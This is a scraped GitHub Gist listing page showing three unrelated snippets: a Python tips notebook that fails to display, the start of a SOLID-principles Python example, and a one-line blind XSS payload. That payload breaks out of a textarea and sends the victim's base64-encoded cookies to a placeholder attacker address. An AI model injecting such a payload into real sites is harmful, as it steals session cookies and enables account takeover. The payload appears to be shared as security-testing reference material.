Skip to content

Instantly share code, notes, and snippets.

View ShubhamJagtap2000's full-sized avatar
😄
Is pleased!

Shubham S Jagtap ShubhamJagtap2000

😄
Is pleased!
View GitHub Profile
@ShubhamJagtap2000
ShubhamJagtap2000 / BlindXSS-payload1.js
Created September 5, 2022 14:02
Sample payload used in Blind XSS
</textarea><script>fetch('http://{URL_OR_IP:Port}?cookie=' + btoa(document.cookie) );</script>
@sreeragh-ar
sreeragh-ar / python_quick_tips.ipynb
Created June 23, 2021 14:07
Python_quick_tips.ipynb
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
@dmmeteo
dmmeteo / 1.srp.py
Last active June 7, 2024 14:11
SOLID Principles explained in Python with examples.
"""
Single Responsibility Principle
“…You had one job” — Loki to Skurge in Thor: Ragnarok
A class should have only one job.
If a class has more than one responsibility, it becomes coupled.
A change to one responsibility results to modification of the other responsibility.
"""
class Animal:
def __init__(self, name: str):